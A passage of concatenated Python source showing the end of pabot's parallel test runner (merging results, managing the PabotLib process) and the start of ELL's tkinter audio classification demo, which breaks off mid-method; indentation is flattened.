"all": {"total": 0, "passed": 0, "failed": 0},
}
if pabot_args["argumentfiles"]:
outputs = [] # type: List[str]
for index, _ in pabot_args["argumentfiles"]:
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
outputs += [
_merge_one_run(
os.path.join(outs_dir, index),
options,
tests_root_name,
stats,
copied_artifacts,
outputfile=os.path.join("pabot_results", "output%s.xml" % index),
)
]
if "output" not in options:
options["output"] = "output.xml"
_write_stats(stats)
return rebot(*outputs, **_options_for_rebot(options, start_time_string, _now()))
else:
return _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
)
def _write_stats(stats):
crit = stats["critical"]
al = stats["all"]
_write(
"%d critical tests, %d passed, %d failed"
% (crit["total"], crit["passed"], crit["failed"])
)
_write(
"%d tests total, %d passed, %d failed"
% (al["total"], al["passed"], al["failed"])
)
_write("===================================================")
def _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
):
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
output_path = _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts
)
_write_stats(stats)
if (
"report" in options
and options["report"] == "NONE"
and "log" in options
and options["log"] == "NONE"
):
options[
"output"
] = output_path # REBOT will return error 252 if nothing is written
else:
_write("Output: %s" % output_path)
options["output"] = None # Do not write output again with rebot
return rebot(output_path, **_options_for_rebot(options, start_time_string, _now()))
def _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts, outputfile=None
):
outputfile = outputfile or options.get("output", "output.xml")
output_path = os.path.abspath(
os.path.join(options.get("outputdir", "."), outputfile)
)
files = sorted(glob(os.path.join(_glob_escape(outs_dir), "**/*.xml")))
if not files:
_write('WARN: No output files in "%s"' % outs_dir, Color.YELLOW)
return ""
def invalid_xml_callback():
global _ABNORMAL_EXIT_HAPPENED
_ABNORMAL_EXIT_HAPPENED = True
if PY2:
files = [f.decode(SYSTEM_ENCODING) if not is_unicode(f) else f for f in files]
resu = merge(
files, options, tests_root_name, copied_artifacts, invalid_xml_callback
)
_update_stats(resu, stats)
resu.save(output_path)
return output_path
def _update_stats(result, stats):
s = result.statistics
stats["critical"]["total"] += s.total.critical.total
stats["critical"]["passed"] += s.total.critical.passed
stats["critical"]["failed"] += s.total.critical.failed
stats["all"]["total"] += s.total.all.total
stats["all"]["passed"] += s.total.all.passed
stats["all"]["failed"] += s.total.all.failed
# This is from https://github.com/django/django/blob/master/django/utils/glob.py
_magic_check = re.compile("([*?[])")
def _glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
pathname = _magic_check.sub(r"[\1]", pathname)
return drive + pathname
def _writer():
while True:
message = MESSAGE_QUEUE.get()
if message is None:
MESSAGE_QUEUE.task_done()
return
print(message)
sys.stdout.flush()
MESSAGE_QUEUE.task_done()
def _write(message, color=None):
MESSAGE_QUEUE.put(_wrap_with(color, message))
def _wrap_with(color, message):
if _is_output_coloring_supported() and color:
return "%s%s%s" % (color, message, Color.ENDC)
return message
def _is_output_coloring_supported():
return sys.stdout.isatty() and os.name in Color.SUPPORTED_OSES
def _start_message_writer():
t = threading.Thread(target=_writer)
t.start()
def _stop_message_writer():
MESSAGE_QUEUE.put(None)
MESSAGE_QUEUE.join()
def _start_remote_library(pabot_args): # type: (dict) -> Optional[subprocess.Popen]
global _PABOTLIBURI
_PABOTLIBURI = "%s:%s" % (pabot_args["pabotlibhost"], pabot_args["pabotlibport"])
if not pabot_args["pabotlib"]:
return None
if pabot_args.get("resourcefile") and not os.path.exists(
pabot_args["resourcefile"]
):
_write(
"Warning: specified resource file doesn't exist."
" Some tests may fail or continue forever.",
Color.YELLOW,
)
pabot_args["resourcefile"] = None
return subprocess.Popen(
'"{python}" -m {pabotlibname} {resourcefile} {pabotlibhost} {pabotlibport}'.format(
python=sys.executable,
pabotlibname=pabotlib.__name__,
resourcefile=pabot_args.get("resourcefile"),
pabotlibhost=pabot_args["pabotlibhost"],
pabotlibport=pabot_args["pabotlibport"],
),
shell=True,
)
def _stop_remote_library(process): # type: (subprocess.Popen) -> None
_write("Stopping PabotLib process")
try:
remoteLib = Remote(_PABOTLIBURI)
remoteLib.run_keyword("stop_remote_libraries", [], {})
remoteLib.run_keyword("stop_remote_server", [], {})
except RuntimeError:
_write("Could not connect to PabotLib - assuming stopped already")
return
i = 50
while i > 0 and process.poll() is None:
time.sleep(0.1)
i -= 1
if i == 0:
_write(
"Could not stop PabotLib Process in 5 seconds " "- calling terminate",
Color.YELLOW,
)
process.terminate()
else:
_write("PabotLib process stopped")
def _get_suite_root_name(suite_names):
top_names = [x.top_name() for group in suite_names for x in group]
if top_names and top_names.count(top_names[0]) == len(top_names):
return top_names[0]
return ""
class QueueItem(object):
_queue_index = 0
def __init__(
self,
datasources,
outs_dir,
options,
execution_item,
command,
verbose,
argfile,
hive=None,
processes=0,
):
# type: (List[str], str, Dict[str, object], ExecutionItem, List[str], bool, Tuple[str, Optional[str]], Optional[str], int) -> None
self.datasources = datasources
self.outs_dir = (
outs_dir.encode("utf-8") if PY2 and is_unicode(outs_dir) else outs_dir
)
self.options = options
self.execution_item = (
execution_item if not hive else HivedItem(execution_item, hive)
)
self.command = command
self.verbose = verbose
self.argfile_index = argfile[0]
self.argfile = argfile[1]
self._index = QueueItem._queue_index
QueueItem._queue_index += 1
self.last_level = None
self.hive = hive
self.processes = processes
@property
def index(self):
# type: () -> int
return self._index
@property
def display_name(self):
# type: () -> str
if self.argfile:
return "%s {%s}" % (self.execution_item.name, self.argfile)
return self.execution_item.name
def _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
is_dry_run = (
options.get("dryrun")
if ROBOT_VERSION >= "2.8"
else options.get("runmode") == "DryRun"
)
if is_dry_run:
all_items = _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
)
else:
all_items = _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
_construct_index_and_completed_index(all_items)
_construct_last_levels(all_items)
return all_items
def _construct_index_and_completed_index(all_items):
# type: (List[List[QueueItem]]) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
for item_group in all_items:
for item in item_group:
_NOT_COMPLETED_INDEXES.append(item.index)
def _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
for suite_group in suite_names:
# TODO: Fix this better
if (
options.get("randomize") in ["all", "suites"]
and "suitesfrom" not in pabot_args
):
random.shuffle(suite_group)
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
all_items.append(items)
return all_items
def _create_items(datasources, opts_for_run, outs_dir, pabot_args, suite_group):
return [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
argfile,
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
for argfile in pabot_args["argumentfiles"] or [("", None)]
]
def _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
processes_count = pabot_args["processes"]
for suite_group in suite_names:
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
chunk_size = (
round(len(items) / processes_count)
if len(items) > processes_count
else len(items)
)
chunked_items = list(_chunk_items(items, chunk_size))
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(chunked_items)
all_items.append(chunked_items)
return all_items
def _chunk_items(items, chunk_size):
for i in range(0, len(items), chunk_size):
chunked_items = items[i : i + chunk_size]
base_item = chunked_items[0]
if not base_item:
continue
execution_items = SuiteItems([item.execution_item for item in chunked_items])
chunked_item = QueueItem(
base_item.datasources,
base_item.outs_dir,
base_item.options,
execution_items,
base_item.command,
base_item.verbose,
(base_item.argfile_index, base_item.argfile),
processes=base_item.processes,
)
yield chunked_item
def _find_ending_level(name, group):
n = name.split(".")
level = -1
for other in group:
o = other.split(".")
dif = [i for i in range(min(len(o), len(n))) if o[i] != n[i]]
if dif:
level = max(dif[0], level)
else:
return name + ".PABOT_noend"
return ".".join(n[: (level + 1)])
def _construct_last_levels(all_items):
names = []
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
names.append(suite.name)
else:
names.append(item.execution_item.name)
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
item.last_level = _find_ending_level(
suite.name, names[item.index + 1 :]
)
else:
item.last_level = _find_ending_level(
item.execution_item.name, names[item.index + 1 :]
)
def _initialize_queue_index():
global _PABOTLIBURI
plib = Remote(_PABOTLIBURI)
# INITIALISE PARALLEL QUEUE MIN INDEX
for i in range(300):
try:
plib.run_keyword(
"set_parallel_value_for_key",
[pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE, 0],
{},
)
return
except RuntimeError as e:
# REMOTE LIB NOT YET CONNECTED
time.sleep(0.1)
raise RuntimeError("Can not connect to PabotLib at %s" % _PABOTLIBURI)
def _add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
):
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
if not _pabotlib_in_use():
return
plib = Remote(_PABOTLIBURI)
new_suites = plib.run_keyword("get_added_suites", [], {})
if len(new_suites) == 0:
return
suite_group = [DynamicSuiteItem(s, v) for s, v in new_suites]
items = [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
("", None),
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
]
with _COMPLETED_LOCK:
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
for item in items:
_NOT_COMPLETED_INDEXES.append(item.index)
execution_items.insert(0, items)
def main(args=None):
global _PABOTLIBPROCESS
args = args or sys.argv[1:]
if len(args) == 0:
print(
"[ "
+ _wrap_with(Color.RED, "ERROR")
+ " ]: Expected at least 1 argument, got 0."
)
print("Try --help for usage information.")
sys.exit(252)
start_time = time.time()
start_time_string = _now()
# NOTE: timeout option
try:
_start_message_writer()
options, datasources, pabot_args, opts_for_run = parse_args(args)
if pabot_args["help"]:
print(__doc__)
sys.exit(0)
if len(datasources) == 0:
print("[ " + _wrap_with(Color.RED, "ERROR") + " ]: No datasources given.")
print("Try --help for usage information.")
sys.exit(252)
_PABOTLIBPROCESS = _start_remote_library(pabot_args)
if _pabotlib_in_use():
_initialize_queue_index()
outs_dir = _output_dir(options)
suite_names = solve_suite_names(outs_dir, datasources, options, pabot_args)
if pabot_args["verbose"]:
_write("Suite names resolved in %s seconds" % str(time.time() - start_time))
ordering = pabot_args.get("ordering")
if ordering:
suite_names = _preserve_order(suite_names, ordering)
suite_names = _group_by_wait(_group_by_groups(suite_names))
if not suite_names or suite_names == [[]]:
_write("No tests to execute")
if not options.get("runemptysuite", False):
sys.exit(252)
execution_items = _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
while execution_items:
items = execution_items.pop(0)
_parallel_execute(items, pabot_args["processes"])
_add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
)
result_code = _report_results(
outs_dir,
pabot_args,
options,
start_time_string,
_get_suite_root_name(suite_names),
)
sys.exit(result_code if not _ABNORMAL_EXIT_HAPPENED else 252)
except Information as i:
print(__doc__)
print(i.message)
except DataError as err:
print(err.message)
sys.exit(252)
except Exception:
_write("[ERROR] EXCEPTION RAISED DURING PABOT EXECUTION", Color.RED)
_write(
"[ERROR] PLEASE CONSIDER REPORTING THIS ISSUE TO https://github.com/mkorpela/pabot/issues",
Color.RED,
)
raise
finally:
if _PABOTLIBPROCESS:
_stop_remote_library(_PABOTLIBPROCESS)
_print_elapsed(start_time, time.time())
_stop_message_writer()
if __name__ == "__main__":
main()
|
view_audio.py
|
#!/usr/bin/env python3
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: view_audio.py
# Authors: Chris Lovett, Chuck Jacobs
#
# Requires: Python 3.x, numpy, tkinter, matplotlib
#
###################################################################################################
import argparse
import json
import os
from threading import Thread, Lock, get_ident
import sys
import tkinter as tk
from tkinter import BOTH, RIGHT, TOP, X, END
from tkinter import Text
from tkinter.ttk import Frame, LabelFrame, Button, Entry
import numpy as np
import matplotlib
# Embedding matplotlib plots in tkinter views requires using the "TkAgg" backend
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
# local modules
import classifier
import featurizer
import microphone
import speaker
import wav_reader
import vad
script_dir = os.path.dirname(os.path.abspath(__file__))
sys.path += [os.path.join(script_dir, "training")]
import make_vad
class SpectrogramImage(Frame):
""" A tkinter scrolling spectrogram widget """
def __init__(self, master, colormap_name="inferno"):
self.colormap_name = colormap_name
super(SpectrogramImage, self).__init__(master)
self.features_figure = Figure(figsize=(5, 4), dpi=100)
self.subplot = self.features_figure.add_subplot(111)
self.data_shape = None
canvas = FigureCanvasTkAgg(self.features_figure, master=self)
canvas.draw()
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=True)
def begin_animation(self, func):
# (30 fps is usually fine)
return animation.FuncAnimation(self.features_figure, func, interval=33, blit=True)
def clear(self, data):
self.subplot.clear()
self.spectrogram_image = self.subplot.imshow(data, vmin=0,
vmax=1, origin="lower", animated=True,
cmap=pyplot.get_cmap(self.colormap_name))
def show(self, data):
""" the result of this function is an image object that is animatable """
if self.data_shape != data.shape or self.spectrogram_image is None:
self.clear(data)
else:
min_value = np.min(data)
max_value = np.max(data)
if not np.isfinite(min_value):
min_value = 0
if not np.isfinite(max_value):
max_value = 1
eps = 0.1
if max_value - min_value < eps:
max_value = min_value + eps
self.spectrogram_image.set_clim(min_value, max_value)
self.spectrogram_image.set_data(data)
self.data_shape = data.shape
return self.spectrogram_image
class AudioDemo(Frame):
""" A demo application class that provides simple GUI for testing featurizer+classifier on
microphone or wav file input. """
def __init__(self, featurizer_model=None, classifier_model=None, auto_scale=True,
sample_rate=None, channels=None, input_device=None, categories=None,
image_width=80, threshold=None, wav_file=None, clear=5, serial=None, vad_model=None,
smoothing=None, ignore_list=None):
""" Initialize AudioDemo object
featurizer_model - the path to the ELL featurizer
classifier_model - the path to the ELL classifier
auto_scale - auto scale audio input to range [-1, 1]
sample_rate - sample rate to featurizer is expecting
channels - number of channels featurizer is expecting
input_device - optional id of microphone to use
categories - path to file containing category labels
image_width - width of the spectrogram image
threshold - ignore predictions that have confidence below this number (e.g. 0.5)
wav_file - optional wav_file to use when you click Play
serial - optional serial input, reading numbers from the given serial port.
vad_model - optional ELL model containing VoiceActivityDetector
smoothing - controls the size of the smoothing window (defaults to 0).
ignore_list - list of category labels to ignore (like 'background' or 'silence')
"""
super().__init__()
self.CLASSIFIER_MODEL_KEY = "classifier_model"
self.FEATURIZER_MODEL_KEY = "featurizer_model"
self.WAV_FILE_KEY = "wav_file"
self.CATEGORY_FILE_KEY = "categories"
self.get_settings_file_name()
self.load_settings()
self.reading_input = False
self.featurizer_model = None
self.serial_port = serial
self.smoothing = smoothing
self.ignore_list = ignore_list
if featurizer_model:
self.featurizer_model = featurizer_model
self.settings[self.FEATURIZER_MODEL_KEY] = featurizer_model
elif self.FEATURIZER_MODEL_KEY in self.settings:
self.featurizer_model = self.settings[self.FEATURIZER_MODEL_KEY]
self.classifier_model = None
if classifier_model:
self.classifier_model = classifier_model
self.settings[self.CLASSIFIER_MODEL_KEY] = classifier_model
elif self.CLASSIFIER_MODEL_KEY in self.settings:
self.classifier_model = self.settings[self.CLASSIFIER_MODEL_KEY]
self.vad = None
if vad_model:
self.vad = vad.VoiceActivityDetector(vad_model)
self.previous_vad = 0
self.wav_filename = wav_file
if self.wav_filename is None and self.WAV_FILE_KEY in self.settings:
self.wav_filename = self.settings[self.WAV_FILE_KEY]
self.wav_file_list = None
self.auto_scale = auto_scale
self.sample_rate = sample_rate if sample_rate is not None else 16000
self.channels = channels if channels is not None else 1
self.input_device = input_device
self.num_classifier_features = None
self.vad = None
self.vad_reset = (vad_model is not None)
self.previous_vad = 0
self.vad_latch = 3 # only reset after 3 vad=0 signals to smooth vad signal a bit.
if not categories and self.CATEGORY_FILE_KEY in self.settings:
categories = self.settings[self.CATEGORY_FILE_KEY]
self.categories = categories
if categories:
self.settings[self.CATEGORY_FILE_KEY] = categories
self.save_settings() # in case we just changed it.
self.audio_level = 0
self.min_level = 0
self.max_level = 0
self.threshold = threshold
self.output_clear_time = int(clear * 1000) if clear else 5000
self.featurizer = None
self.classifier = None
self.wav_file = None
self.speaker = None
self.microphone = None
self.animation = None
self.show_classifier_output = True
self.last_prediction = None
self.probability = 0
# Threads
self.read_input_thread = None
self.lock = Lock()
self.main_thread = get_ident()
self.message_queue = []
# UI components
self.max_spectrogram_width = image_width
self.features_entry = None
self.classifier_feature_data = None
self.spectrogram_image_data = None
self.init_ui()
if self.featurizer_model:
self.load_featurizer_model(os.path.abspath(self.featurizer_model))
else:
self.show_output("Please specify and load a feature model")
if smoothing == "vad":
# smooth up to 1 second worth of predictions
self.smoothing = int(self.sample_rate / self.featurizer.input_size)
if vad_model is None:
vad_model = make_vad.make_vad("vad.ell", self.sample_rate, self.featurizer.input_size,
self.featurizer.output_size, None)
if self.classifier_model:
self.load_classifier(self.classifier_model)
self.setup_spectrogram_image()
else:
self.show_output("Please specify and load a classifier model")
if vad_model:
self.vad = vad.VoiceActivityDetector(vad_model)
def get_settings_file_name(self):
""" this app stores the various UI field values in a settings file in your temp folder
so you don't always have to specify the full command line options """
import tempfile
temp = tempfile.gettempdir()
self.settings_file_name = os.path.join(temp, "ELL", "Audio", "viewaudio.json")
def load_settings(self):
""" load the previously saved settings from disk, if any """
self.settings = {}
print("loading settings from: {}".format(self.settings_file_name))
if os.path.isfile(self.settings_file_name):
with open(self.settings_file_name, "r") as f:
self.settings = json.load(f)
def save_settings(self):
""" save the current settings to disk """
settings_dir = os.path.dirname(self.settings_file_name)
if not os.path.isdir(settings_dir):
os.makedirs(settings_dir)
with open(self.settings_file_name, "w") as f:
json.dump(self.settings, f, indent=2)
def load_featurizer_model(self, featurizer_model):
""" load the given compiled ELL featurizer for use in processing subsequent audio input """
if featurizer_model:
self.featurizer = featurizer.AudioTransform(featurizer_model, 40)
self.setup_spectrogram_image()
self.show_output("Feature input size: {}, output size: {}".format(
self.featurizer.input_size,
self.featurizer.output_size))
if self.features_entry.get() != featurizer_model:
self.features_entry.delete(0, END)
self.features_entry.insert(0, featurizer_model)
self.init_data()
def load_classifier(self, classifier_path):
""" load the given compiled ELL classifier for use in processing subsequent audio input """
if classifier_path:
self.classifier = classifier.AudioClassifier(classifier_path, self.categories, self.threshold,
smoothing_window=self.smoothing,
ignore_list=self.ignore_list)
self.show_output("Classifier input size: {}, output size: {}".format(
self.classifier.input_size,
self.classifier.output_size))
if self.classifier_entry.get() != classifier_path:
self.classifier_entry.delete(0, END)
self.classifier_entry.insert(0, classifier_path)
self.init_data()
def init_data(self):
""" initialize the spectrogram_image_data and classifier_feature_data based on the newly loaded model info """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
if self.spectrogram_widget:
self.spectrogram_widget.clear(self.spectrogram_image_data)
if self.classifier:
self.num_classifier_features = self.classifier.input_size // self.featurizer.output_size
dim = (self.num_classifier_features, self.featurizer.output_size)
self.classifier_feature_data = np.zeros(dim, dtype=float)
def accumulate_feature(self, feature_data):
""" accumulate the feature data and pass feature data to classifier """
if self.vad:
vad_signal = self.vad.predict(feature_data)
if self.previous_vad != vad_signal:
if vad_signal == 0:
if self.vad_latch > 0:
# wait for 2 more to smooth the vad signal a bit.
self.vad_latch -= 1
else:
self.vad_latch = 3
self.previous_vad = vad_signal
if self.vad_reset:
self.show_output("--- reset ---")
self.classifier.reset()
else:
self.show_output("--- clear history ---")
self.classifier.clear_smoothing()
elif vad_signal == 1:
self.vad_latch = 3
self.previous_vad = vad_signal
self.audio_level = np.sum([x * x for x in feature_data])
if self.classifier and self.show_classifier_output:
self.classifier_feature_data = np.vstack((self.classifier_feature_data,
feature_data))[-self.num_classifier_features:, :]
self.evaluate_classifier()
def accumulate_spectrogram_image(self, feature_data):
""" accumulate the feature data into the spectrogram image """
image_data = self.spectrogram_image_data
feature_data = np.reshape(feature_data, [-1, 1])
new_image = np.hstack((image_data, feature_data))[:, -image_data.shape[1]:]
image_data[:, :] = new_image
def update_rgb_led(self):
# This helper function uses the RGB led UI to give an indication of audio levels (brightness)
# and voice activity (red)
level = self.audio_level
if level < self.min_level:
self.min_level = level
if level > self.max_level:
self.max_level = level
red = 0.0
green = 0.0
blue = 0.0
range = self.max_level - self.min_level
if range == 0:
range = 1.0
brightness = 128 * (level - self.min_level) / range
if self.previous_vad:
red = brightness + 127
else:
green = brightness + 127
rgb = "#{:02x}{:02x}{:02x}".format(int(red), int(green), int(blue))
self.rgb_canvas.itemconfig(self.rgb_oval, fill=rgb)
def on_ui_update(self):
# this is an animation callback to update the UI every 33 milliseconds.
self.update_rgb_led()
self.process_output()
result = self.set_spectrogram_image()
if not self.reading_input:
self.after(1, self.on_stopped)
return (result,)
def set_spectrogram_image(self):
""" update the spectrogram image and the min/max values """
self.lock.acquire() # protect access to the shared state
result = self.spectrogram_widget.show(self.spectrogram_image_data)
self.lock.release()
return result
def get_correct_shape(self, shape):
""" for some reason keras stores input shape as (None,80,40), and numpy hates that
so we have to change this to (1,80,40) """
shape = list(shape)
fix = [x if x else 1 for x in shape]
return tuple(fix)
def clear_output(self):
""" remove some of the Output based a the timeout callback """
self.output_text.delete(1.0, 2.0)
def process_output(self):
""" show output that was queued by background thread """
self.lock.acquire()
messages = self.message_queue
self.message_queue = []
self.lock.release()
for msg in messages:
self.show_output(msg)
def show_output(self, message):
""" show output message, or queue it if we are on a background thread """
if self.main_thread != get_ident():
self.message_queue += [message]
return
for line in str(message).split('\n'):
self.output_text.insert(END, "{}\n".format(line))
self.output_text.see("end") # scroll to end
self.after(self.output_clear_time, self.clear_output)
def evaluate_classifier(self):
""" run the classifier model on the current feature data and show the prediction, if any """
if self.evaluate_classifier and self.classifier and self.classifier_feature_data is not None:
prediction, probability, label, _ = self.classifier.predict(self.classifier_feature_data.ravel())
if prediction is not None:
percent = int(100 * probability)
if label == "silence":
self.classifier.reset()
elif self.last_prediction != prediction or self.probability < probability:
self.last_prediction = prediction
self.probability = probability
self.show_output(" DETECTED ({}) {}% {}".format(prediction, percent, label))
def start_playing(self, filename):
""" Play a wav file, and classify the audio. Note we use a background thread to read the
wav file and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the audio playback """
if self.speaker is None:
self.speaker = speaker.Speaker()
self.stop()
self.reading_input = False
self.wav_file = wav_reader.WavReader(self.sample_rate, self.channels, self.auto_scale)
self.wav_file.open(filename, self.featurizer.input_size, self.speaker)
def update_func(frame_index):
return self.on_ui_update()
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image)
self.animation = self.spectrogram_widget.begin_animation(update_func)
# start background thread to read and classify the audio.
self.featurizer.open(self.wav_file)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def start_recording(self):
""" Start recording audio from the microphone nd classify the audio. Note we use a background thread to
process the audio and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the microphone readings """
self.stop()
input_channel = None
if self.serial_port:
import serial_reader
self.serial = serial_reader.SerialReader(0.001)
self.serial.open(self.featurizer.input_size, self.serial_port)
input_channel = self.serial
else:
if self.microphone is None:
self.microphone = microphone.Microphone(auto_scale=self.auto_scale, console=False)
num_channels = 1
self.microphone.open(self.featurizer.input_size, self.sample_rate, num_channels, self.input_device)
input_channel = self.microphone
def update_func(frame_index):
return self.on_ui_update()
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image)
self.animation = self.spectrogram_widget.begin_animation(update_func)
# start background thread to read and classify the recorded audio.
self.featurizer.open(input_channel)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def on_read_features(self):
""" this is the background thread entry point. So we read the feature data in a loop
and pass it to the classifier """
try:
while self.reading_input and self.featurizer:
feature_data = self.featurizer.read()
if feature_data is None:
break # eof
else:
self.lock.acquire()
self.accumulate_feature(feature_data)
self.accumulate_spectrogram_image(feature_data)
self.lock.release()
except:
errorType, value, traceback = sys.exc_info()
print("### Exception reading input: " + str(errorType) + ": " + str(value) + " " + str(traceback))
while traceback:
print(traceback.tb_frame.f_code)
traceback = traceback.tb_next
self.reading_input = False
if self.classifier:
self.classifier.reset() # good time to reset.
def stop(self):
""" called when user clicks the stop button, or we reach the end of a wav file input """
# close streams
if self.animation:
self.animation.event_source.stop()
self.animation = None
if self.microphone:
self.microphone.close()
if self.speaker:
self.speaker.close()
if self.wav_file:
self.wav_file.close()
self.wav_file = None
self.reading_input = False
self.last_prediction = None
self.probability = 0
if self.classifier:
self.classifier.reset() # good time to reset.
def on_rec_button_click(self):
""" called when user clicks the record button, same button is used to "stop" recording. """
if self.rec_button["text"] == "Rec":
self.rec_button["text"] = "Stop"
self.play_button["text"] = "Play"
self.start_recording()
else:
self.rec_button["text"] = "Rec"
self.on_stop()
def on_play_button_click(self):
""" called when user clicks the record button, same button is used to "stop" playback """
if self.play_button["text"] == "Play":
self.play_button["text"] = "Stop"
self.rec_button["text"] = "Rec"
self.on_play()
else:
self.play_button["text"] = "Play"
self.on_stop()
def on_play(self):
""" called when user clicks the Play button """
filename = self.wav_filename_entry.get()
filename = filename.strip('"')
self.wav_filename = filename
self.settings[self.WAV_FILE_KEY] = filename
self.save_settings()
self.start_playing(filename)
def on_stop(self):
""" called when user clicks the Stop button """
self.reading_input = False
if self.wav_file:
self.wav_file.close()
self.wav_file = None
if self.read_input_thread:
self.read_input_thread.join()
self.read_input_thread = None
self.stop()
def on_stopped(self):
""" called when we reach the end of the wav file playback """
self.play_button["text"] = "Play"
self.stop()
def get_wav_list(self):
if self.wav_filename and os.path.isfile(self.wav_filename):
dir_name = os.path.dirname(self.wav_filename)
if not self.wav_file_list:
self.wav_file_list = [x for x in os.listdir(dir_name) if os.path.splitext(x)[1] == ".wav"]
self.wav_file_list.sort()
return self.wav_file_list
def select_wav_file(self, filename):
self.wav_filename = filename
# show the file in the UI
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# and automatically play the file.
self.on_play()
def on_minus_key(self, event):
""" When user presses the plus button we reverse to the previous wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i - 1 >= 0:
next_wav_file = self.wav_file_list[i - 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def on_plus_key(self, event):
""" When user presses the plus button we advance to the next wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i + 1 < len(self.wav_file_list):
next_wav_file = self.wav_file_list[i + 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def init_ui(self):
""" setup the GUI for the app """
self.master.title("Test")
self.pack(fill=BOTH, expand=True)
# Input section
input_frame = LabelFrame(self, text="Input")
input_frame.bind("-", self.on_minus_key)
input_frame.bind("+", self.on_plus_key)
input_frame.pack(fill=X)
self.play_button = Button(input_frame, text="Play", command=self.on_play_button_click)
self.play_button.pack(side=RIGHT, padx=4)
self.rgb_canvas = tk.Canvas(input_frame, width=20, height=20, bd=0)
self.rgb_oval = self.rgb_canvas.create_oval(2, 2, 20, 20, fill='#FF0000', width=0)
self.rgb_canvas.pack(side=RIGHT, padx=4)
self.rec_button = Button(input_frame, text="Rec", command=self.on_rec_button_click)
self.rec_button.pack(side=RIGHT, padx=4)
self.wav_filename_entry = Entry(input_frame, width=24)
self.wav_filename_entry.pack(fill=X)
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# Feature section
features_frame = LabelFrame(self, text="Features")
features_frame.pack(fill=X)
features_control_frame = Frame(features_frame)
features_control_frame.pack(fill=X)
load_features_button = Button(features_control_frame, text="Load", command=self.on_load_featurizer_model)
load_features_button.pack(side=RIGHT)
self.features_entry = Entry(features_control_frame, width=8)
self.features_entry.pack(fill=X)
self.features_entry.delete(0, END)
if self.featurizer_model:
self.features_entry.insert(0, self.featurizer_model)
self.spectrogram_widget = SpectrogramImage(features_frame)
self.spectrogram_widget.pack(fill=X)
# Classifier section
classifier_frame = LabelFrame(self, text="Classifier")
classifier_frame.pack(fill=X)
load_classifier_button = Button(classifier_frame, text="Load", command=self.on_load_classifier)
load_classifier_button.pack(side=RIGHT)
self.classifier_entry = Entry(classifier_frame, width=8)
self.classifier_entry.pack(fill=X)
self.classifier_entry.delete(0, END)
if self.classifier_model:
